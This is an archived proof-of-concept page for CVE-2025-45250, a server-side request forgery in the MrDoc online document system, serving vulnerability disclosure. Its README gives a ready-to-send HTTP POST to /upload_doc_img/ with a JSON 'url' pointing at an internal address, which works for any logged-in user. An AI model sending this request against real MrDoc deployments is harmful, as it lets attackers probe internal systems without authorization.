CVE-2025-45250 PoC — mrdoc 安全漏洞

Source

https://github.com/Anike-x/CVE-2025-45250

Associated Vulnerability

Title:mrdoc 安全漏洞 (CVE-2025-45250)
Description:mrdoc是zmister2016个人开发者的一个基于python开发的在线文档系统。 mrdoc 0.9.5及之前版本存在安全漏洞，该漏洞源于validate_url函数导致服务端请求伪造。

Readme

# CVE-2025-45250

### Suggested description

```
MrDoc <=0.95 is vulnerable to Server-Side Request Forgery (SSRF) in the validate_url function of the app_doc/utils.py file.
```

### POC

```
POST /upload_doc_img/ HTTP/1.1
Host: ip:port
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: your cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{
  "url": "http://127.0.0.2"
}
```

To reproduce this vulnerability, you must be logged in to obtain the cookie value. Allows an attacker to trick a server into making malicious requests to internal or external systems

File Snapshot


 [4.0K]  /data/pocs/f5292b6ad28a3adbbf0ac33c1ef417e79350af1b
└── [ 923]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!